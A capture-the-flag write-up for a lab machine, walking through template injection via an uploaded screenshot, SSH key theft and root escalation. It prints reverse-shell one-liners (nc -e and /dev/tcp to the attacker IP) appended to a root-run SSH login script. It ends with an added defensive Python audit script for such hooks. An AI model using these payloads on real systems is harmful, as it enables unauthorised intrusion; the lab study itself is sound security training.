┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.129.168.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-26 18:52 EDT
Nmap scan report for 10.129.168.169
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.50 seconds
Port 80

There is a link to http://images.late.htb/, so let's add it to the /etc/hosts file.

We get a form to upload an image.

I got stuck on this for a while trying to find the injection point, because the uploaded image is actually supposed to give you back text. I already knew that I had to exploit Flask because I had done it in a previous box; I was just stuck on where to put my payload. And finally it hit me: I had to write my payload in a text editor, make it very big, take a screenshot of it and upload the resulting image to the server. So I tried the usual first payload for Flask: {{7*7}}

And right after the upload I got this beautiful text indicating that my payload worked!

49

It is now time to try to get a reverse shell using this trick!

After a few tries I got a working ls (done with mousepad and then zoomed in).

We are connected. This foothold was really painful and required patience because the size of the font in the image matters a lot. Here are a few tips if you are stuck.
The payloads have to be on one line.
I used mousepad with a light theme and zoomed in to make the font bigger.
If for some reason the exploit did not work because of the font size, go back to the font that was working before and edit your picture in GIMP or a similar tool, joining the two parts of the line so that it is on one line.

We also took the user flag using this image.
Indeed, with the enumeration we find a .ssh folder, and in it a private key.
We get the private key!

Privilege escalation

Let's enumerate the machine with linpeas.
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220508/linpeas_linux_amd64 (on our machine)
python3 -m http.server 80 (we serve our file with the Python HTTP server)
wget http://10.10.14.11/linpeas_linux_amd64 (we get the file on the target)
chmod +x linpeas_linux_amd64 (we make it executable)

LinPEAS result analysis

New path exported: /home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

The ssh-alert.sh script sends an email when someone logs in using ssh.

We can check the processes with pspy; these are interesting, and they are launched as root.

So now we know that a process is using chattr to make ssh-alert.sh append-only.

We could append a malicious command to the file and get a reverse shell this way; we would trigger it by connecting through ssh. We have to be fast, though, because a cron job reverts the files regularly.

Let's launch a listener: rlwrap nc -lvp 4444

Note: I first tried to append to the file with nc, echo 'nc 10.10.14.11 4444 -e /bin/bash' >> ssh-alert.sh, as it was installed on the machine, but the shell I caught back did not let me run commands.

echo '/bin/bash -i >& /dev/tcp/10.10.14.11/4444 0>&1' >> ssh-alert.sh
This one did the trick.
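The root cause of the privilege escalation above is a script that root runs on every SSH login while a low-privileged user is allowed to append to it; the append-only attribute set with chattr does nothing against `>>`, and the cron job that restores the file only shortens the window. The following Python script is an added example, not part of the original writeup or of the box: it audits a root-executed hook script (ownership, group/world write bits, symlink, writable parent directory) and lists which PATH entries the calling user could write to, the same two conditions LinPEAS flagged here. The ssh-alert.sh file, its contents and the PATH value it builds are constructed stand-ins for the demo; only the stdlib is used.

```python
import os
import stat
import tempfile


def audit_root_hook(path):
    """Return a list of findings for a script that root executes on an
    event (an SSH-login alert hook, a cron job). Empty list = nothing found.
    Note: chattr +a (append-only) is deliberately not treated as protection,
    because appending is exactly what an attacker needs."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("is a symlink (target may be user-controlled)")
        return findings
    if st.st_uid != 0:
        findings.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # chattr +i/+a on the file does not help if the directory lets a
    # non-root user rename or replace the file, so check the parent too.
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not pst.st_mode & stat.S_ISVTX:
        findings.append("parent directory writable without sticky bit")
    return findings


def writable_path_entries(path_value):
    """Return the PATH entries the current user can write to. When a PATH
    exported by a root cron job contains such an entry, a binary dropped
    there shadows the real command."""
    return [d for d in path_value.split(":")
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def demo():
    """Constructed scenario: a hook script left world-writable, then the
    same script with the mode a defender would expect (root-owned 0700).
    Returns (weak_findings, fixed_findings, writable_dirs, scratch_dir)."""
    work = tempfile.mkdtemp()                      # scratch dir, mode 0700
    hook = os.path.join(work, "ssh-alert.sh")      # constructed stand-in
    with open(hook, "w") as f:
        f.write("#!/bin/bash\n# mails an alert on ssh login (stand-in)\n")
    os.chmod(hook, 0o666)                          # weak: anyone may append
    weak = audit_root_hook(hook)
    os.chmod(hook, 0o700)                          # hardened: owner-only
    fixed = audit_root_hook(hook)
    # PATH as LinPEAS reported it on the box, with the scratch dir prepended
    # so the demo has one entry that is certainly writable by us.
    exported = work + ":/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    return weak, fixed, writable_path_entries(exported), work


if __name__ == "__main__":
    weak, fixed, wdirs, work = demo()
    print("weak  :", weak)
    print("fixed :", fixed)
    print("writable PATH dirs:", wdirs)
```

Run as the low-privileged user on a host to get the attacker's view; run as root to see what a root cron job would actually be exposed to. A clean result on a real system is an empty list from audit_root_hook and no PATH entry outside root-owned system directories; the fix on this box is the same as in demo(): keep the hook root-owned with mode 0700 and drop the user-owned directory from the PATH the cron job exports.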